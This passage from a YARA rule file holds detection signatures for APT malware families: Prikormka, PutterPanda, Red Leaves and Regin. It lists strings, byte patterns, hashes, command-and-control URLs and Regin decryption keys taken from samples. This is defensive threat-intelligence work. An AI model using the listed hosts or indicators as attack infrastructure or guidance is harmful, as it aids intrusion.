    hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778"
    hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216"
  strings:
    $s0 = "{\\*\\generator Msftedit 5.41." ascii
    $s1 = "Attachment 1: Complete Professional Background" ascii
    $s2 = "E-mail:  \\cf1\\ul\\f1"
    $s3 = "Education:\\par" ascii
    $s5 = "@gmail.com" ascii
  condition:
    uint32(0) == 1953651835 and filesize < 512000 and 3 of them
}

rule PrikormkaDropper {
  strings:
    $mz = { 4D 5A }
    $kd1 = "KDSTORAGE" wide
    $kd2 = "KDSTORAGE_64" wide
    $kd3 = "KDRUNDRV32" wide
    $kd4 = "KDRAR" wide
    $bin1 = { 69 65 04 15 00 14 1E 4A 16 42 08 6C 21 61 24 0F }
    $bin2 = { 76 6F 05 04 16 1B 0D 5E 0D 42 08 6C 20 45 18 16 }
    $bin3 = { 4D 00 4D 00 43 00 00 00 67 00 75 00 69 00 64 00 56 00 47 00 41 00 00 00 5F 00 73 00 76 00 67 00 }
    $inj1 = "?AVCinj2008Dlg@@" ascii
    $inj2 = "?AVCinj2008App@@" ascii
  condition:
    ($mz at 0) and ((any of ($bin*)) or (3 of ($kd*)) or (all of ($inj*)))
}

rule PrikormkaModule {
  strings:
    $mz = { 4D 5A }
    $str1 = { 6D 70 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00 }
    $str2 = { 68 6C 70 75 63 74 66 2E 64 6C 6C 00 43 79 63 6C 65 }
    $str3 = { 00 6B 6C 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 00 }
    $str4 = { 69 6F 6D 75 73 2E 64 6C 6C 00 53 74 61 72 74 69 6E 67 }
    $str5 = { 61 74 69 6D 6C 2E 64 6C 6C 00 4B 69 63 6B 49 6E 50 6F 69 6E 74 }
    $str6 = { 73 6E 6D 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64 }
    $str7 = { 73 63 72 73 68 2E 64 6C 6C 00 47 65 74 52 65 61 64 79 46 6F 72 44 65 61 64 }
    $str8 = { 50 52 55 5C 17 51 58 17 5E 4A }
    $str9 = { 60 4A 55 55 4E 53 58 4B 17 52 57 17 5E 4A }
    $str10 = { 55 52 5D 4E 5B 4A 5D 17 51 58 17 5E 4A }
    $str11 = { 60 4A 55 55 4E 61 17 51 58 17 5E 4A }
    $str12 = { 39 5D 17 1D 1C 0A 3C 57 59 3B 1C 1E 57 58 4C 54 0F }
    $str13 = "ZxWinDeffContex" ascii wide
    $str14 = "Paramore756Contex43" wide
    $str15 = "Zw_&one@ldrContext43" wide
    $str16 = "A95BL765MNG2GPRS"
    $str17 = "helpldr.dll" wide fullword
    $str18 = "swma.dll" wide fullword
    $str19 = "iomus.dll" wide fullword
    $str20 = "atiml.dll" wide fullword
    $str21 = "hlpuctf.dll" wide fullword
    $str22 = "hauthuid.dll" ascii wide fullword
    $str23 = "[roboconid][%s]" ascii fullword
    $str24 = "[objectset][%s]" ascii fullword
    $str25 = "rbcon.ini" wide fullword
    $str26 = "%s%02d.%02d.%02d_%02d.%02d.%02d.skw" ascii fullword
    $str27 = "%02d.%02d.%02d_%02d.%02d.%02d.%02d.rem" wide fullword
    $str28 = ":\\!PROJECTS!\\Mina\\2015\\" ascii
    $str29 = "\\PZZ\\RMO\\" ascii
    $str30 = ":\\work\\PZZ" ascii
    $str31 = "C:\\Users\\mlk\\" ascii
    $str32 = ":\\W o r k S p a c e\\" ascii
    $str33 = "D:\\My\\Projects_All\\2015\\" ascii
    $str34 = "\\TOOLS PZZ\\Bezzahod\\" ascii
  condition:
    ($mz at 0) and (any of ($str*))
}

rule PrikormkaEarlyVersion {
  strings:
    $mz = { 4D 5A }
    $str36 = "IntelRestore" ascii fullword
    $str37 = "Resent" wide fullword
    $str38 = "ocp8.1" wide fullword
    $str39 = "rsfvxd.dat" ascii fullword
    $str40 = "tsb386.dat" ascii fullword
    $str41 = "frmmlg.dat" ascii fullword
    $str42 = "smdhost.dll" ascii fullword
    $str43 = "KDLLCFX" wide fullword
    $str44 = "KDLLRUNDRV" wide fullword
  condition:
    ($mz at 0) and (2 of ($str*))
}

rule Prikormka {
  meta:
    Author = "Anton Cherepanov"
    Date = "2016/05/10"
    Description = "Operation Groundbait"
    Source = "https://github.com/eset/malware-ioc/"
    Contact = "threatintel@eset.com"
    License = "BSD 2-Clause"
  condition:
    PrikormkaDropper or PrikormkaModule or PrikormkaEarlyVersion
}

rule APT_Malware_PutterPanda_Rel {
  meta:
    description = "Detects an APT malware related to PutterPanda"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "5367e183df155e3133d916f7080ef973f7741d34"
  strings:
    $x0 = "app.stream-media.net" ascii fullword
    $x1 = "File %s does'nt exist or is forbidden to acess!" ascii fullword
    $s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" ascii fullword
    $s7 = "Connect %s error!" ascii fullword
    $s9 = "Download file %s successfully!" ascii fullword
    $s10 = "index.tmp" ascii fullword
    $s11 = "Execute PE Successfully" ascii fullword
    $s13 = "aa/22/success.xml" ascii fullword
    $s16 = "aa/22/index.asp" ascii fullword
    $s18 = "File %s a Non-Pe File" ascii fullword
    $s19 = "SendRequset error!" ascii fullword
    $s20 = "filelist[%d]=%s" ascii fullword
  condition:
    (uint16(0) == 23117 and 1 of ($x*)) or (4 of ($s*))
}

rule APT_Malware_PutterPanda_Rel_2 {
  meta:
    description = "APT Malware related to PutterPanda Group"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381"
  strings:
    $s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" ascii fullword
    $s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" ascii fullword
    $s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" ascii fullword
    $s3 = "Internet connect error:%d" ascii fullword
    $s4 = "Proxy-Authorization:Basic" ascii fullword
    $s5 = "HttpQueryInfo failed:%d" ascii fullword
    $s6 = "read file error:%d" ascii fullword
    $s7 = "downdll.dll" ascii fullword
    $s8 = "rz.dat" ascii fullword
    $s9 = "Invalid url" ascii fullword
    $s10 = "Create file failed" ascii fullword
    $s11 = "myAgent" ascii fullword
    $s12 = "%s%s%d%d" ascii fullword
    $s13 = "down file success" ascii fullword
    $s15 = "error!" ascii fullword
    $s18 = "Avaliable data:%u bytes" ascii fullword
  condition:
    uint16(0) == 23117 and 6 of them
}

rule APT_Malware_PutterPanda_PSAPI {
  meta:
    description = "Detects a malware related to Putter Panda"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5"
  strings:
    $s0 = "LOADER ERROR" ascii fullword
    $s1 = "The procedure entry point %s could not be located in the dynamic link library %s" ascii fullword
    $s2 = "psapi.dll" ascii fullword
    $s3 = "urlmon.dll" ascii fullword
    $s4 = "WinHttpGetProxyForUrl" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule APT_Malware_PutterPanda_WUAUCLT {
  meta:
    description = "Detects a malware related to Putter Panda"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "fd5ca5a2d444865fa8320337467313e4026b9f78"
  strings:
    $x0 = "WUAUCLT.EXE" wide fullword
    $x1 = "%s\\tmp%d.exe" ascii fullword
    $x2 = "Microsoft Corporation. All rights reserved." wide fullword
    $s1 = "Microsoft Windows Operating System" wide fullword
    $s2 = "InternetQueryOptionA" ascii fullword
    $s3 = "LookupPrivilegeValueA" ascii fullword
    $s4 = "WNetEnumResourceA" ascii fullword
    $s5 = "HttpSendRequestExA" ascii fullword
    $s6 = "PSAPI.DLL" ascii fullword
    $s7 = "Microsoft(R) Windows(R) Operating System" wide fullword
    $s8 = "CreatePipe" ascii fullword
    $s9 = "EnumProcessModules" ascii fullword
  condition:
    all of ($x*) or (1 of ($x*) and all of ($s*))
}

rule APT_Malware_PutterPanda_Gen1 {
  meta:
    description = "Detects a malware "
    author = "YarGen Rule Generator"
    reference = "not set"
    date = "2015-06-03"
    super_rule = 1
    hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a"
    hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796"
    hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad"
  strings:
    $s1 = "%s%duserid=%dthreadid=%dgroupid=%d" ascii fullword
    $s2 = "ssdpsvc.dll" ascii fullword
    $s3 = "Fail %s " ascii fullword
    $s4 = "%s%dpara1=%dpara2=%dpara3=%d" ascii fullword
    $s5 = "LsaServiceInit" ascii fullword
    $s6 = "%-8d Fs %-12s Bs " ascii fullword
    $s7 = "Microsoft DH SChannel Cryptographic Provider" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and 5 of them
}

rule Malware_MsUpdater_String_in_EXE {
  meta:
    description = "MSUpdater String in Executable"
    author = "Florian Roth"
    score = 50
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb"
  strings:
    $x1 = "msupdate.exe" wide fullword
    $x3 = "msupdater.exe" ascii fullword
    $x4 = "msupdater32.exe" ascii fullword
    $x5 = "msupdater32.exe" wide fullword
    $x6 = "msupdate.pif" ascii fullword
    $fp1 = "_msupdate_" wide
    $fp2 = "_msupdate_" ascii
    $fp3 = "/kies" wide
  condition:
    uint16(0) == 23117 and filesize < 512000 and (1 of ($x*)) and not (1 of ($fp*))
}

rule APT_Malware_PutterPanda_MsUpdater_3 {
  meta:
    description = "Detects Malware related to PutterPanda - MSUpdater"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0"
  strings:
    $s0 = "msupdater.exe" ascii fullword
    $s1 = "Explorer.exe \"" ascii fullword
    $s2 = "FAVORITES.DAT" ascii fullword
    $s4 = "COMSPEC" ascii fullword
  condition:
    uint16(0) == 23117 and 3 of them
}

rule APT_Malware_PutterPanda_MsUpdater_1 {
  meta:
    description = "Detects Malware related to PutterPanda - MSUpdater"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "b55072b67543f58c096571c841a560c53d72f01a"
  strings:
    $x0 = "msupdate.exe" wide fullword
    $x1 = "msupdate" wide fullword
    $s1 = "Microsoft Corporation. All rights reserved." wide fullword
    $s2 = "Automatic Updates" wide fullword
    $s3 = "VirtualProtectEx" ascii fullword
    $s4 = "Invalid parameter" ascii fullword
    $s5 = "VirtualAllocEx" ascii fullword
    $s6 = "WriteProcessMemory" ascii fullword
  condition:
    (uint16(0) == 23117 and 1 of ($x*) and 4 of ($s*)) or (1 of ($x*) and all of ($s*))
}

rule APT_Malware_PutterPanda_MsUpdater_2 {
  meta:
    description = "Detects Malware related to PutterPanda - MSUpdater"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    hash = "365b5537e3495f8ecfabe2597399b1f1226879b1"
  strings:
    $s0 = "winsta0\\default" ascii fullword
    $s1 = "EXPLORER.EXE" ascii fullword
    $s2 = "WNetEnumResourceA" ascii fullword
    $s3 = "explorer.exe" ascii fullword
    $s4 = "CreateProcessAsUserA" ascii fullword
    $s5 = "HttpSendRequestExA" ascii fullword
    $s6 = "HttpEndRequestA" ascii fullword
    $s7 = "GetModuleBaseNameA" ascii fullword
    $s8 = "GetModuleFileNameExA" ascii fullword
    $s9 = "HttpSendRequestA" ascii fullword
    $s10 = "HttpOpenRequestA" ascii fullword
    $s11 = "InternetConnectA" ascii fullword
    $s12 = "Process32Next" ascii fullword
    $s13 = "Process32First" ascii fullword
    $s14 = "CreatePipe" ascii fullword
    $s15 = "EnumProcesses" ascii fullword
    $s16 = "LookupPrivilegeValueA" ascii fullword
    $s17 = "PeekNamedPipe" ascii fullword
    $s18 = "EnumProcessModules" ascii fullword
    $s19 = "PSAPI.DLL" ascii fullword
    $s20 = "SPSSSQ" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 225280 and all of them
}

rule APT_Malware_PutterPanda_Gen4 {
  meta:
    description = "Detects Malware related to PutterPanda"
    author = "Florian Roth"
    score = 70
    reference = "VT Analysis"
    date = "2015-06-03"
    super_rule = 1
    hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c"
    hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552"
    hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0"
    hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e"
    hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689"
  strings:
    $x1 = "rz.dat" ascii fullword
    $s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" ascii fullword
    $s1 = "Internet connect error:%d" ascii fullword
    $s2 = "Proxy-Authorization:Basic " ascii fullword
    $s5 = "Invalid url" ascii fullword
    $s6 = "Create file failed" ascii fullword
    $s7 = "myAgent" ascii fullword
    $z1 = "%s%s%d%d" ascii fullword
    $z2 = "HttpQueryInfo failed:%d" ascii fullword
    $z3 = "read file error:%d" ascii fullword
    $z4 = "down file success" ascii fullword
    $z5 = "kPStoreCreateInstance" ascii fullword
    $z6 = "Avaliable data:%u bytes" ascii fullword
    $z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" ascii fullword
  condition:
    filesize < 307200 and ((uint16(0) == 23117 and $x1 and 3 of ($s*)) or (3 of ($s*) and 4 of ($z*)))
}

rule malware_red_leaves_generic {
  meta:
    author = "David Cannings"
    description = "Red Leaves malware, related to APT10"
    sha256 = "2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c"
  strings:
    $ = "Feb 04 2015"
    $ = "I can not start %s"
    $ = "dwConnectPort" fullword
    $ = "dwRemoteLanPort" fullword
    $ = "strRemoteLanAddress" fullword
    $ = "strLocalConnectIp" fullword
    $ = "\\\\.\\pipe\\NamePipe_MoreWindows" wide
    $ = "RedLeavesCMDSimulatorMutex" wide
    $ = "(NT %d.%d Build %d)" wide
    $ = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide
    $ = "red_autumnal_leaves_dllmain.dll" ascii wide
    $ = "__data" wide
    $ = "__serial" wide
    $ = "__upt" wide
    $ = "__msgid" wide
  condition:
    7 of them
}

rule malware_red_leaves_memory {
  meta:
    author = "David Cannings"
    description = "Red Leaves C&C left in memory, use with Volatility / Rekall"
  strings:
    $ = "__msgid=" ascii wide
    $ = "__serial=" ascii wide
    $ = "OnlineTime=" wide
    $ = "clientpath=" ascii wide
    $ = "serverpath=" ascii wide
  condition:
    3 of them
}

rule Regin_APT_KernelDriver_Generic_A {
  meta:
    description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
    author = "@Malwrsignatures - included in APT Scanner THOR"
    date = "23.11.14"
    hash1 = "187044596bc1328efa0ed636d8aa4a5c"
    hash2 = "06665b96e293b23acc80451abb413e50"
    hash3 = "d240f06e98c8d3e647cbf4d442d79475"
  strings:
    $m0 = { 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 }
    $m1 = { 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E }
    $s0 = "atapi.sys" wide fullword
    $s1 = "disk.sys" wide fullword
    $s3 = "h.data" ascii fullword
    $s4 = "\\system32" ascii fullword
    $s5 = "\\SystemRoot" ascii fullword
    $s6 = "system" ascii fullword
    $s7 = "temp" ascii fullword
    $s8 = "windows" ascii fullword
    $x1 = "LRich6" ascii fullword
    $x2 = "KeServiceDescriptorTable" ascii fullword
  condition:
    $m0 at 0 and $m1 and all of ($s*) and 1 of ($x*)
}

rule Regin_APT_KernelDriver_Generic_B {
  meta:
    description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
    author = "@Malwrsignatures - included in APT Scanner THOR"
    date = "23.11.14"
    hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
    hash2 = "bfbe8c3ee78750c3a520480700e440f8"
    hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
    hash4 = "06665b96e293b23acc80451abb413e50"
    hash5 = "2c8b9d2885543d7ade3cae98225e263b"
    hash6 = "4b6b86c7fec1c574706cecedf44abded"
    hash7 = "187044596bc1328efa0ed636d8aa4a5c"
    hash8 = "d240f06e98c8d3e647cbf4d442d79475"
    hash9 = "6662c390b2bbbd291ec7987388fc75d7"
    hash10 = "1c024e599ac055312a4ab75b3950040a"
    hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
    hash12 = "b505d65721bb2453d5039a389113b566"
    hash13 = "b269894f434657db2b15949641a67532"
  strings:
    $m0 = { 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 }
    $s1 = { 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E }
    $s2 = "H.data" ascii nocase fullword
    $s3 = "INIT" ascii fullword
    $s4 = "ntoskrnl.exe" ascii fullword
    $v1 = "\\system32" ascii fullword
    $v2 = "\\SystemRoot" ascii fullword
    $v3 = "KeServiceDescriptorTable" ascii fullword
    $w1 = "\\system32" ascii fullword
    $w2 = "\\SystemRoot" ascii fullword
    $w3 = "LRich6" ascii fullword
    $x1 = "_snprintf" ascii fullword
    $x2 = "_except_handler3" ascii fullword
    $y1 = "mbstowcs" ascii fullword
    $y2 = "wcstombs" ascii fullword
    $y3 = "KeGetCurrentIrql" ascii fullword
    $z1 = "wcscpy" ascii fullword
    $z2 = "ZwCreateFile" ascii fullword
    $z3 = "ZwQueryInformationFile" ascii fullword
    $z4 = "wcslen" ascii fullword
    $z5 = "atoi" ascii fullword
  condition:
    $m0 at 0 and all of ($s*) and (all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*)) and filesize < 20480
}

rule Regin_APT_KernelDriver_Generic_C {
  meta:
    description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
    author = "@Malwrsignatures - included in APT Scanner THOR"
    date = "23.11.14"
    hash1 = "e0895336617e0b45b312383814ec6783556d7635"
    hash2 = "732298fa025ed48179a3a2555b45be96f7079712"
  strings:
    $m0 = { 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 }
    $s0 = "KeGetCurrentIrql" ascii fullword
    $s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" wide fullword
    $s2 = "usbclass" wide fullword
    $x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
    $x2 = "Universal Serial Bus Class Driver" wide fullword
    $x3 = "5.2.3790.0" wide fullword
    $y1 = "LSA Shell" wide fullword
    $y2 = "0Richw" ascii fullword
  condition:
    $m0 at 0 and all of ($s*) and (all of ($x*) or all of ($y*)) and filesize < 20480
}

rule Regin_sig_svcsstat {
  meta:
    description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
    author = "@MalwrSignatures"
    date = "26.11.14"
    hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
  strings:
    $s0 = "Service Control Manager" ascii fullword
    $s1 = "_vsnwprintf" ascii fullword
    $s2 = "Root Agency" ascii fullword
    $s3 = "Root Agency0" ascii fullword
    $s4 = "StartServiceCtrlDispatcherA" ascii fullword
    $s5 = "\\\\?\\UNC" wide fullword
    $s6 = "%ls%ls" wide fullword
  condition:
    all of them and filesize < 15360 and filesize > 10240
}

rule Regin_Sample_1 {
  meta:
    description = "Auto-generated rule - file-3665415_sys"
    author = "@MalwrSignatures"
    date = "26.11.14"
    hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
  strings:
    $s0 = "Getting PortName/Identifier failed - %x" ascii fullword
    $s1 = "SerialAddDevice - error creating new devobj [%#08lx]" ascii fullword
    $s2 = "External Naming Failed - Status %x" ascii fullword
    $s3 = "------- Same multiport - different interrupts" ascii fullword
    $s4 = "%x occurred prior to the wait - starting the" ascii fullword
    $s5 = "'user registry info - userPortIndex: %d" ascii fullword
    $s6 = "Could not report legacy device - %x" ascii fullword
    $s7 = "entering SerialGetPortInfo" ascii fullword
    $s8 = "'user registry info - userPort: %x" ascii fullword
    $s9 = "IoOpenDeviceRegistryKey failed - %x " ascii fullword
    $s10 = "Kernel debugger is using port at address %X" ascii fullword
    $s12 = "Release - freeing multi context" ascii fullword
    $s13 = "Serial driver will not load port" ascii fullword
    $s14 = "'user registry info - userAddressSpace: %d" ascii fullword
    $s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" ascii fullword
    $s20 = "'user registry info - userIndexed: %d" ascii fullword
  condition:
    all of them and filesize < 112640 and filesize > 81920
}

rule Regin_Sample_2 {
  meta:
    description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
    author = "@MalwrSignatures"
    date = "26.11.14"
    hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
  strings:
    $s0 = "\\SYSTEMROOT\\system32\\lsass.exe" wide fullword
    $s1 = "atapi.sys" wide fullword
    $s2 = "disk.sys" wide fullword
    $s3 = "IoGetRelatedDeviceObject" ascii fullword
    $s4 = "HAL.dll" ascii fullword
    $s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" ascii fullword
    $s6 = "PsGetCurrentProcessId" ascii fullword
    $s7 = "KeGetCurrentIrql" ascii fullword
    $s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
    $s9 = "KeSetImportanceDpc" ascii fullword
    $s10 = "KeQueryPerformanceCounter" ascii fullword
    $s14 = "KeInitializeEvent" ascii fullword
    $s15 = "KeDelayExecutionThread" ascii fullword
    $s16 = "KeInitializeTimerEx" ascii fullword
    $s18 = "PsLookupProcessByProcessId" ascii fullword
    $s19 = "ExReleaseFastMutexUnsafe" ascii fullword
    $s20 = "ExAcquireFastMutexUnsafe" ascii fullword
  condition:
    all of them and filesize < 40960 and filesize > 30720
}

rule Regin_Sample_3 {
  meta:
    description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
    author = "@Malwrsignatures"
    date = "27.11.14"
    hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
  strings:
    $hd = { FE BA DC FE }
    $s0 = "Service Pack x" wide fullword
    $s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide fullword
    $s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" wide fullword
    $s3 = "mntoskrnl.exe" wide fullword
    $s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" wide fullword
    $s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
    $s6 = "Service Pack" wide fullword
    $s7 = ".sys" wide fullword
    $s8 = ".dll" wide fullword
    $s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" wide fullword
    $s11 = "IoGetRelatedDeviceObject" ascii fullword
    $s12 = "VMEM.sys" ascii fullword
    $s13 = "RtlGetVersion" wide fullword
    $s14 = "ntkrnlpa.exe" ascii fullword
  condition:
    ($hd at 0) and all of ($s*) and filesize > 163840 and filesize < 204800
}

rule Regin_Sample_Set_1 {
  meta:
    description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
    author = "@MalwrSignatures"
    date = "26.11.14"
    hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
    hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"
  strings:
    $s0 = "HAL.dll" ascii fullword
    $s1 = "IoGetDeviceObjectPointer" ascii fullword
    $s2 = "MaximumPortsServiced" wide fullword
    $s3 = "KeGetCurrentIrql" ascii fullword
    $s4 = "ntkrnlpa.exe" ascii fullword
    $s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
    $s6 = "ConnectMultiplePorts" wide fullword
    $s7 = "\\SYSTEMROOT" wide fullword
    $s8 = "IoWriteErrorLogEntry" ascii fullword
    $s9 = "KeQueryPerformanceCounter" ascii fullword
    $s10 = "KeServiceDescriptorTable" ascii fullword
    $s11 = "KeRemoveEntryDeviceQueue" ascii fullword
    $s12 = "SeSinglePrivilegeCheck" ascii fullword
    $s13 = "KeInitializeEvent" ascii fullword
    $s14 = "IoBuildDeviceIoControlRequest" ascii fullword
    $s15 = "KeRemoveDeviceQueue" ascii fullword
    $s16 = "IofCompleteRequest" ascii fullword
    $s17 = "KeInitializeSpinLock" ascii fullword
    $s18 = "MmIsNonPagedSystemAddressValid" ascii fullword
    $s19 = "IoCreateDevice" ascii fullword
    $s20 = "KefReleaseSpinLockFromDpcLevel" ascii fullword
  condition:
    all of them and filesize < 40960 and filesize > 30720
}

rule Regin_Sample_Set_2 {
  meta:
    description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
    author = "@MalwrSignatures"
    date = "27.11.14"
    hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
    hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
  strings:
    $hd = { FE BA DC FE }
    $s0 = "d%ls%ls" wide fullword
    $s1 = "\\\\?\\UNC" wide fullword
    $s2 = "Software\\Microsoft\\Windows\\CurrentVersion" wide fullword
    $s3 = "\\\\?\\UNC\\" wide fullword
    $s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" wide fullword
    $s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
    $s6 = "\\\\.\\Global\\%s" wide fullword
    $s7 = "temp" wide fullword
    $s8 = "\\\\.\\%s" wide fullword
    $s9 = "Memory location: 0x%p, size 0x%08x" wide fullword
    $s10 = "sscanf" ascii fullword
    $s11 = "disp.dll" ascii fullword
    $s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" ascii fullword
    $s13 = "%d.%d.%d.%d%c" ascii fullword
    $s14 = "imagehlp.dll" ascii fullword
    $s15 = "%hd %d" ascii fullword
  condition:
    ($hd at 0) and all of ($s*) and filesize < 460800 and filesize > 368640
}

rule apt_regin_legspin {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Regin's Legspin module"
    version = "1.0"
    last_modified = "2015-01-22"
    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
    md5 = "29105f46e4d33f66fee346cfd099d1cc"
  strings:
    $mz = "MZ"
    $a1 = "sharepw"
    $a2 = "reglist"
    $a3 = "logdump"
    $a4 = "Name:" wide
    $a5 = "Phys Avail:"
    $a6 = "cmd.exe" wide
    $a7 = "ping.exe" wide
    $a8 = "millisecs"
  condition:
    ($mz at 0) and all of ($a*)
}

rule apt_regin_hopscotch {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Regin's Hopscotch module"
    version = "1.0"
    last_modified = "2015-01-22"
    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
    md5 = "6c34031d7a5fc2b091b623981a8ae61c"
  strings:
    $mz = "MZ"
    $a1 = "AuthenticateNetUseIpc"
    $a2 = "Failed to authenticate to"
    $a3 = "Failed to disconnect from"
    $a4 = "%S\\ipc$" wide
    $a5 = "Not deleting..."
    $a6 = "CopyServiceToRemoteMachine"
    $a7 = "DH Exchange failed"
    $a8 = "ConnectToNamedPipes"
  condition:
    ($mz at 0) and all of ($a*)
}

rule apt_regin_2011_32bit_stage1 {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Regin 32 bit stage 1 loaders"
    version = "1.0"
    last_modified = "2014-11-18"
  strings:
    $key1 = { 33 10 15 EA 26 1D 38 A7 }
    $key2 = { 91 45 A9 8B A3 76 17 DE }
    $key3 = { EF 74 5F 23 AA 67 24 3D }
    $mz = "MZ"
  condition:
    ($mz at 0) and any of ($key*) and filesize < 300000
}

rule apt_regin_rc5key {
  meta:
    copyright = "Kaspersky Lab"
    description = "Rule to detect Regin RC5 decryption keys"
    version = "1.0"
    last_modified = "2014-11-18"
  strings:
    $key1 = { 73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01 }
    $key2 = { 10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78 }
  condition:
    any of ($key*)
}

rule apt_regin_vfs {
  meta:
    copyright = "Kaspersky Lab"
    author = "Kaspersky Lab"
    description = "Rule to detect Regin VFSes"
    version = "1.0"
    last_modified = "2014-11-18"
  strings:
    $a1 = { 00 02 00 08 00 08 03 F6 D7 F3 52 }
    $a2 = { 00 10 F0 FF F0 FF 11 C7 7F E8 52 }
    $a3 = { 00 04 00 10 00 10 03 C2 D3 1C 93 }
    $a4 = { 00 04 00 10 C8 00 04 C8 93 06 D8 }
  condition:
